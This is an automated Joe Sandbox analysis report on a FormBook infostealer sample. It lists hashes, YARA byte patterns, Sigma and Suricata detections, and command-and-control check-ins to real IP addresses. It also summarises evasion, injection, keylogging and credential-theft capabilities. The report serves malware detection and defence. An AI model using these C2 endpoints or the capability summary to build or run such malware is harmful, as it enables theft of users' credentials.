Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
enkJ6J7dAn.exe

Overview

General Information

Sample name:enkJ6J7dAn.exe
renamed because original name is a hash value
Original sample name:6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f.exe
Analysis ID:1529036
MD5:dc1b0b674722f76e68cdfcd373c34ab9
SHA1:c6862db7bccf03b7e3a66f98cc05b4bf624cc9fa
SHA256:6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • enkJ6J7dAn.exe (PID: 5588 cmdline: "C:\Users\user\Desktop\enkJ6J7dAn.exe" MD5: DC1B0B674722F76E68CDFCD373C34AB9)
    • svchost.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\enkJ6J7dAn.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • avmjQSNkeFbUoa.exe (PID: 4984 cmdline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • RmClient.exe (PID: 6348 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)
          • avmjQSNkeFbUoa.exe (PID: 4568 cmdline: "C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3180 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e333:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f133:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ParentImage: C:\Users\user\Desktop\enkJ6J7dAn.exe, ParentProcessId: 5588, ParentProcessName: enkJ6J7dAn.exe, ProcessCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ProcessId: 6716, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ParentImage: C:\Users\user\Desktop\enkJ6J7dAn.exe, ParentProcessId: 5588, ParentProcessName: enkJ6J7dAn.exe, ProcessCommandLine: "C:\Users\user\Desktop\enkJ6J7dAn.exe", ProcessId: 6716, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:37:51.503796+020020507451Malware Command and Control Activity Detected192.168.2.54986344.213.25.7080TCP
            2024-10-08T15:38:15.642976+020020507451Malware Command and Control Activity Detected192.168.2.549979206.119.82.13480TCP
            2024-10-08T15:38:29.065298+020020507451Malware Command and Control Activity Detected192.168.2.54998367.223.117.18980TCP
            2024-10-08T15:38:50.414469+020020507451Malware Command and Control Activity Detected192.168.2.5499873.33.130.19080TCP
            2024-10-08T15:39:04.853667+020020507451Malware Command and Control Activity Detected192.168.2.549991183.181.83.13180TCP
            2024-10-08T15:39:18.595077+020020507451Malware Command and Control Activity Detected192.168.2.54999538.47.232.19680TCP
            2024-10-08T15:39:34.811433+020020507451Malware Command and Control Activity Detected192.168.2.5499993.33.130.19080TCP
            2024-10-08T15:39:48.799063+020020507451Malware Command and Control Activity Detected192.168.2.550003154.212.219.280TCP
            2024-10-08T15:40:03.615615+020020507451Malware Command and Control Activity Detected192.168.2.550007133.130.35.9080TCP
            2024-10-08T15:40:18.283403+020020507451Malware Command and Control Activity Detected192.168.2.5500113.33.130.19080TCP
            2024-10-08T15:40:32.455735+020020507451Malware Command and Control Activity Detected192.168.2.550015172.191.244.6280TCP
            2024-10-08T15:40:45.957320+020020507451Malware Command and Control Activity Detected192.168.2.550019162.241.244.10680TCP
            2024-10-08T15:41:04.179629+020020507451Malware Command and Control Activity Detected192.168.2.550023199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:37:51.503796+020028554651A Network Trojan was detected192.168.2.54986344.213.25.7080TCP
            2024-10-08T15:38:15.642976+020028554651A Network Trojan was detected192.168.2.549979206.119.82.13480TCP
            2024-10-08T15:38:29.065298+020028554651A Network Trojan was detected192.168.2.54998367.223.117.18980TCP
            2024-10-08T15:38:50.414469+020028554651A Network Trojan was detected192.168.2.5499873.33.130.19080TCP
            2024-10-08T15:39:04.853667+020028554651A Network Trojan was detected192.168.2.549991183.181.83.13180TCP
            2024-10-08T15:39:18.595077+020028554651A Network Trojan was detected192.168.2.54999538.47.232.19680TCP
            2024-10-08T15:39:34.811433+020028554651A Network Trojan was detected192.168.2.5499993.33.130.19080TCP
            2024-10-08T15:39:48.799063+020028554651A Network Trojan was detected192.168.2.550003154.212.219.280TCP
            2024-10-08T15:40:03.615615+020028554651A Network Trojan was detected192.168.2.550007133.130.35.9080TCP
            2024-10-08T15:40:18.283403+020028554651A Network Trojan was detected192.168.2.5500113.33.130.19080TCP
            2024-10-08T15:40:32.455735+020028554651A Network Trojan was detected192.168.2.550015172.191.244.6280TCP
            2024-10-08T15:40:45.957320+020028554651A Network Trojan was detected192.168.2.550019162.241.244.10680TCP
            2024-10-08T15:41:04.179629+020028554651A Network Trojan was detected192.168.2.550023199.59.243.22780TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T15:38:08.600828+020028554641A Network Trojan was detected192.168.2.549956206.119.82.13480TCP
            2024-10-08T15:38:10.550616+020028554641A Network Trojan was detected192.168.2.549973206.119.82.13480TCP
            2024-10-08T15:38:13.144831+020028554641A Network Trojan was detected192.168.2.549978206.119.82.13480TCP
            2024-10-08T15:38:21.384116+020028554641A Network Trojan was detected192.168.2.54998067.223.117.18980TCP
            2024-10-08T15:38:23.946554+020028554641A Network Trojan was detected192.168.2.54998167.223.117.18980TCP
            2024-10-08T15:38:26.501962+020028554641A Network Trojan was detected192.168.2.54998267.223.117.18980TCP
            2024-10-08T15:38:42.752643+020028554641A Network Trojan was detected192.168.2.5499843.33.130.19080TCP
            2024-10-08T15:38:45.280121+020028554641A Network Trojan was detected192.168.2.5499853.33.130.19080TCP
            2024-10-08T15:38:47.853763+020028554641A Network Trojan was detected192.168.2.5499863.33.130.19080TCP
            2024-10-08T15:38:56.866137+020028554641A Network Trojan was detected192.168.2.549988183.181.83.13180TCP
            2024-10-08T15:38:59.367057+020028554641A Network Trojan was detected192.168.2.549989183.181.83.13180TCP
            2024-10-08T15:39:02.344376+020028554641A Network Trojan was detected192.168.2.549990183.181.83.13180TCP
            2024-10-08T15:39:11.019411+020028554641A Network Trojan was detected192.168.2.54999238.47.232.19680TCP
            2024-10-08T15:39:13.570786+020028554641A Network Trojan was detected192.168.2.54999338.47.232.19680TCP
            2024-10-08T15:39:16.163311+020028554641A Network Trojan was detected192.168.2.54999438.47.232.19680TCP
            2024-10-08T15:39:25.036234+020028554641A Network Trojan was detected192.168.2.5499963.33.130.19080TCP
            2024-10-08T15:39:26.658843+020028554641A Network Trojan was detected192.168.2.5499973.33.130.19080TCP
            2024-10-08T15:39:29.175267+020028554641A Network Trojan was detected192.168.2.5499983.33.130.19080TCP
            2024-10-08T15:39:41.168002+020028554641A Network Trojan was detected192.168.2.550000154.212.219.280TCP
            2024-10-08T15:39:43.739751+020028554641A Network Trojan was detected192.168.2.550001154.212.219.280TCP
            2024-10-08T15:39:46.492376+020028554641A Network Trojan was detected192.168.2.550002154.212.219.280TCP
            2024-10-08T15:39:55.958587+020028554641A Network Trojan was detected192.168.2.550004133.130.35.9080TCP
            2024-10-08T15:39:58.521482+020028554641A Network Trojan was detected192.168.2.550005133.130.35.9080TCP
            2024-10-08T15:40:01.304936+020028554641A Network Trojan was detected192.168.2.550006133.130.35.9080TCP
            2024-10-08T15:40:09.260480+020028554641A Network Trojan was detected192.168.2.5500083.33.130.19080TCP
            2024-10-08T15:40:13.226134+020028554641A Network Trojan was detected192.168.2.5500093.33.130.19080TCP
            2024-10-08T15:40:15.751747+020028554641A Network Trojan was detected192.168.2.5500103.33.130.19080TCP
            2024-10-08T15:40:24.764708+020028554641A Network Trojan was detected192.168.2.550012172.191.244.6280TCP
            2024-10-08T15:40:27.311872+020028554641A Network Trojan was detected192.168.2.550013172.191.244.6280TCP
            2024-10-08T15:40:29.819752+020028554641A Network Trojan was detected192.168.2.550014172.191.244.6280TCP
            2024-10-08T15:40:38.306913+020028554641A Network Trojan was detected192.168.2.550016162.241.244.10680TCP
            2024-10-08T15:40:40.828582+020028554641A Network Trojan was detected192.168.2.550017162.241.244.10680TCP
            2024-10-08T15:40:43.543677+020028554641A Network Trojan was detected192.168.2.550018162.241.244.10680TCP
            2024-10-08T15:40:56.509717+020028554641A Network Trojan was detected192.168.2.550020199.59.243.22780TCP
            2024-10-08T15:40:59.095041+020028554641A Network Trojan was detected192.168.2.550021199.59.243.22780TCP
            2024-10-08T15:41:01.636055+020028554641A Network Trojan was detected192.168.2.550022199.59.243.22780TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: enkJ6J7dAn.exeReversingLabs: Detection: 71%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: enkJ6J7dAn.exeJoe Sandbox ML: detected
            Source: enkJ6J7dAn.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose,5_2_0069C280
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then xor eax, eax5_2_00689A00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 4x nop then mov ebx, 00000004h5_2_02CE04E1

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49863 -> 44.213.25.70:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49979 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49979 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 183.181.83.131:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49973 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 67.223.117.189:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50023 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50015 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50015 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 133.130.35.90:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 38.47.232.196:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 154.212.219.2:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 206.119.82.134:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 183.181.83.131:80
